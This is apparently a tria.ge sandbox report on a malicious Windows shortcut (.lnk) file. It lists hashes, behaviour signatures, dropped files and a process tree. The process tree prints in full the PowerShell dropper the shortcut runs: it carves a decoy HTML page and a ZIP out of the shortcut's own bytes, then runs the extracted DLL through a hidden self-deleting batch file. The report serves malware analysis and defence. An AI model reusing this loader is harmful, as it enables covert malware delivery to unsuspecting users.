Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

5a3f1d14b9...JC.lnk

windows7-x64

3

5a3f1d14b9...JC.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    137s
  • max time network
    207s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 11:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c_JC.lnk

  • Size

    4.4MB

  • MD5

    7336068f2c5ed3ed154b6c8b1d72726a

  • SHA1

    e72c90aedd2ef27226d891f464caec19635a6fd3

  • SHA256

    5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c

  • SHA512

    b40df901dbb97198652e83b2e701212d931e5182bc787bb47a9af3faea72151ad40ed7941c36fe0ea0c0151528bee23e458c4f716761fdfffde310e43ffd81b0

  • SSDEEP

    98304:tgHgGZPRjDjDN/v1gFXzz3WC9rW4IowsS7gpfCRhPhajd7H/:tkPRj/DBNgF+CPIow57gIPIjdH/

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 41 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c_JC.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c powershell/W 01 $dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000472AC4} ^| Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000472AC4} ^| Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00091900 -ReadCount 00091900;$pdfPath = \"$env:temp\securityMail_1101.html\"; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004386)) -Encoding Byte; ^& $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -TotalCount 04664004 -ReadCount 04664004;$exePath=\"$env:public\17399.zip\";sc $exePath ([byte[]]($exeFile ^| select -Skip 00091900)) -Encoding Byte;$shell = new-object -com shell.application;$zip = $shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\' + $zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) ^| out-null; remove-item -path $exePath -force;$batPath=\"$env:public\18105.bat\";$cmdline=\"rundll32.exe `\"$executemodule`\",Run`r`ndel /f /q %0\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle hidden;};
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 $dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472AC4} | Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472AC4} | Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00091900 -ReadCount 00091900;$pdfPath = \"$env:temp\securityMail_1101.html\"; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004386)) -Encoding Byte; & $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -TotalCount 04664004 -ReadCount 04664004;$exePath=\"$env:public\17399.zip\";sc $exePath ([byte[]]($exeFile | select -Skip 00091900)) -Encoding Byte;$shell = new-object -com shell.application;$zip = $shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\' + $zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) | out-null; remove-item -path $exePath -force;$batPath=\"$env:public\18105.bat\";$cmdline=\"rundll32.exe `\"$executemodule`\",Run`r`ndel /f /q %0\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle hidden;};
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2720
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\securityMail_1101.html
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3040
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3040 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2928

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    17ef2874e8a0b2241cfc4760766d2780

    SHA1

    fc3311c0f20199d9f1fe8897eb629d01b2dc293e

    SHA256

    c848f04ed2f97e32be0400d825001d10e1e47bedbbd5e3b9f681d1bcab820622

    SHA512

    bf70aa2264bc199d1aa0ce048244175df9b25ac3292d6cad4d07852ae6b4e4ea0701ebf7e1b4aa6fb6500bb1a4875f04f9d9cf6db9a255775607fa8e0a7b0e23

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    567079bfbcaf3cd9366a203ee3a1e02e

    SHA1

    2f7578efe79aadc7e6aa1c954c4e02d9a92f6908

    SHA256

    68f452c730aaaa1cae51567aaca3b6f64e3242df85c7ca794bd24467a7b0a01d

    SHA512

    feaebc77bcd0e2fecca52a5806b6d74a6fe6e684af04b520523bf4da236f271ca085174e3dad2da0d4016708fe9f3d6f2f3cd1931d4fccb3842b3f40f0116570

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    9c010016ae8ae27ae35e0c5afb2f2356

    SHA1

    47872fcaabb2540a797a479b9462826e44708241

    SHA256

    5c7985271957728a957c44f1fbc218ccadd729f67aa9d36ea1f8b0007fbcce64

    SHA512

    c958f91820b8d20e7cfbec190771641b8f0ac0964a67f23138032be90135dedfd33eb30b2e52a27e62dbc5498b874b2c63089ebd6f2ce8e91b6c5d3feca5aeb4

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    37df47cef45957418ff3c101a7aef761

    SHA1

    556ea1e63fe8982d0aaacb9498c27a6dca4a66dc

    SHA256

    1313ab7a6e443181a3ff1a8a1222d8eef9e4cdb4533f5502aa91d1e19948f3a5

    SHA512

    f229e48208c0da41d4881353fde117d1906e393c659c7a4265d56cfd0484138908789782a0844030555b130f6f8ef93420f043ff856483cbc47b83279e75c48f

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    f692fc42e5ea7a3211eb98415684bdf7

    SHA1

    8e56246aa42ef5efafb1d89d52e2dae1d4564438

    SHA256

    07a9219ad4be7b2f911c8721168b7bad9e401f418425a661883771a4b2f767ac

    SHA512

    d9871a027fd1c2b0e3d7695574b1b118e9530438ea5d42992bedf058e9bd4567cf52d45f4c5eda014d206bc068497ff056567152ac2f8b84674b78657a252e4e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    3f661db09d5f8d55ce7d74cd13584aa4

    SHA1

    f0100cce4ac2fe62874c496b753f8ecaba61b171

    SHA256

    ddb8877311bac28515a0982832c164e8d99f5a6c0e3161480bf822445f73a3e1

    SHA512

    3daa718f0cb1f7b8d9559cb500cd24b3488925b68d7cac31dab0f593418719321974aabb52cafb978b7f7fb908038b755de075c9fdc4b1b386b0fddcd9eb9ad5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    482cfe1097a8363ccc8b8911c296dfb9

    SHA1

    4dcd3ac64492cf34250eccb7cb4e3d2c8160050b

    SHA256

    f522de6895d0ee76d41038e3215a54a4d8331ea9fe1eae4b30cd274957b68945

    SHA512

    b7d98080a70f0e0f38ad031e269fb4791bba34c8f93980ee511adae477635c9b389a730ae6b37138471b95986fd92b33063ea6f4e9bb3d3d1111b56ca7b56636

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    22f03ebf1b8e00059eda8e574211cbaa

    SHA1

    9e6ef158a5980f8417d45e15007d69dd76fc74ff

    SHA256

    d933c49693a3dcc7821345358000239acb842e76f890b5f8c442a5ea998e602d

    SHA512

    553414532ab3de8fb6ac257219f8954ce38c804a3c39a591dc49c5371a67e5e762e0581d5bd425e9360b529b7adf3c6b72a7d3f70382ec2c531ba98efb476453

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    9e68256df439b00358e8b67af42cadce

    SHA1

    739b28f2703a0d82a81a5d235b4ae3eff4b58f71

    SHA256

    73e3b61041e662f748824d30c75b09fd6967b518d97c7e2014426cb82ec69aca

    SHA512

    49d853eb8b17370241e003fa7c414faeadd95d3b0442fb1143b10aeb99ac963d9b7883f98b6ee8be7b0023a87a5ca8b01f117474b1939397ed7441c9d7039d58

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    ab0d7d6a0b4b49986249afba99247466

    SHA1

    f95ef28f13f62983809be42e7ccd02e739bc63cf

    SHA256

    dfc70f228ad6acf4b23f185df4811e4e6224972e428514b82e9f0a1048b67272

    SHA512

    76fbecfba95d3da016496474fb4931fa5663cbaf8539d0621161f93ab125b4de878b9ee5ea32d561291e5cc22501a857d8345a6ddd84eed1fc4c1046a5f1fde5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    342c4c0540fde25ed568049c8fe1c12a

    SHA1

    46256476987b21e998a0bc22742be6fd4f559d32

    SHA256

    61458a2582695a572f0e9817b0ca1a9f38b2fc38ba132ad2a779611371fc112f

    SHA512

    8fb335919540593404f51e65533cd0a3f210da58db3c846c030eabade2a92fadf3de121816a61af7461082d97a9470d7cf0a2711767365b53aa19ae65dcd6b83

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    3f8dfc30278bc0973208b75ac95021b8

    SHA1

    1fe0cf3a5dc9a9b385328a002a4a7561c08cd852

    SHA256

    2328fec96fa84424cf5af45581463e610bd95140a8d3352ade60dd904f8c4805

    SHA512

    e6a03452e7ecafb6f5d253b960869451a5ddd45d9d0556716de3d3624a6004991eb864eef6ee68a0fc0138edca4013bb7031939b4d840f5d7a9034963ba292b1

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    7059a2ace62f75c4048a6a4cd458a1f7

    SHA1

    4045ab7a8c7096886cd69a8e36b4ef93ff8d5cf1

    SHA256

    6b8db7013861d4585a13a69617d1804d5f134871974e5af9290d71ed762d78fd

    SHA512

    ea59c577f553ef462a4fa047e7ea071c569bf70b433c48ee64516d2a7a426a2e5051650037140658951455905baa434092c1d8fef063b9782ef5bf1201941a55

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    0484465f5ffd24d3ab25dbdb0c1ad79a

    SHA1

    6f40449c8f588c05ee96b3d1ffacccca1e7f28e6

    SHA256

    6746bc13ea0908dac2798c488887f4505ac676acaa7ea7661ac80b71f326adc9

    SHA512

    2f848c5537afd0c451ff4aca6d101e796d158cada82b2d6ace9c1595102f6ebf2156490a85c7752ced4afdb5f44b684ea75d4b2970f0420434a88a6d3550583c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    511d47b462dfe6b84929b08d14d0be17

    SHA1

    fd3b5e0ed2b30df43499538588b107b9b1bc3e96

    SHA256

    7ba58474a8edb435482e8334bd76b051616eb124e5ce2929b3849a84320e79b0

    SHA512

    5b33f5b3a5f1d651e65fb1239472b439bc1bdde7afd9a738b5c97015fcf0217cd0e43ecc3248482ad861ff3f5a59ea570be113a9d7b8d7e83fbdf360b8957805

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    469234ffbb6718eda14232fd632d9c06

    SHA1

    52315d1e748f7b2066bab7b723d25d9d1bbc391e

    SHA256

    5c861c9fd23e413716346be8bbc3ec525992e71c349a42446dc36eba6522d938

    SHA512

    a80f848f580e73512bd91c033dc7cba33a5fc80b3ab75ceba6e3db492419ac68f0a52a85b66e8efe1ec5e74cfd69db2c614489abb33ea967f7f68708b8140782

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    d635243f6c06f052553dfdb39f9fdea9

    SHA1

    f4e54191b1d08bdb13cc567d3cc9035c9372c49a

    SHA256

    3edb3a54d98e067ce0e53d622065e76d98783ab8e43fbfde16c63f0115dce5d9

    SHA512

    44b8079de6ed2a043662dd98b0cf1cb3e0aaff5fcce35c87b1da30693414703ce1daccc0dcf41f441e47376c8f3dff5d51d11c3c37945b223f6eadfc261026d2

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    fc5612bcb0dac093780124272331327f

    SHA1

    55d391f84cae1a97747176cb493a00f8a77a28eb

    SHA256

    6855d264ed3c9d633d9e7f4f2fa2a23083b3b09bfbee708581c34f77eaa2c7fd

    SHA512

    a1b70d091ab746d60067e2012167882137a579465774ca4b8d6df61446b88814b0d8650cfb773c6c99f2f0bd6a69d78b6c641c1c344c5a7bc20b42ff4dd91028

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    c67a4d69f49cc0851a7c3a058e5d0c68

    SHA1

    8b736079ec266c59047d9f9d4e47a9b0ef8ed339

    SHA256

    a422ac4c471cdb8f12f696eae0a4e981eb88a568d3c75760a3e0310d4016b029

    SHA512

    7bf22fe0f40ce03cb8597ec76e29af343f24f741997adba86c9c8b15afc1f50e2d136d1290bb0160418834e9632e0ba6ca6ff185e3193f5bb096bf90c963e702

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab5EC5.tmp
    Filesize

    61KB

    MD5

    f3441b8572aae8801c04f3060b550443

    SHA1

    4ef0a35436125d6821831ef36c28ffaf196cda15

    SHA256

    6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

    SHA512

    5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar6D0B.tmp
    Filesize

    163KB

    MD5

    9441737383d21192400eca82fda910ec

    SHA1

    725e0d606a4fc9ba44aa8ffde65bed15e65367e4

    SHA256

    bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

    SHA512

    7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\securityMail_1101.html
    Filesize

    85KB

    MD5

    da0504d53d08ab2110b4adcd35ed3721

    SHA1

    a9e9d85e92c5e7f82fbcacfe7a11c0869b636461

    SHA256

    15fc316bcf910a95783e4a13a31aa772635eb6f9cbc2324775c4ab14f37a37b0

    SHA512

    e442ac34b1035fdbd6554224ec295e11972a2c0f31eb4e4ae0de33a23ca4fa18ae31e8bc16f508f3463cc7b263d3a255a6c702934c015a8b36ce31283d8389e3

    Download Submit

  • memory/2720-48-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-52-0x0000000002840000-0x00000000028C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2720-51-0x0000000002840000-0x00000000028C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2720-50-0x0000000002840000-0x00000000028C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2720-49-0x0000000002840000-0x00000000028C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2720-40-0x000000001B460000-0x000000001B742000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2720-47-0x0000000002840000-0x00000000028C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2720-46-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-45-0x0000000002840000-0x00000000028C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2720-44-0x0000000002840000-0x00000000028C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2720-43-0x0000000002840000-0x00000000028C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2720-42-0x0000000001E30000-0x0000000001E38000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2720-41-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

    Filesize

    9.6MB

    Download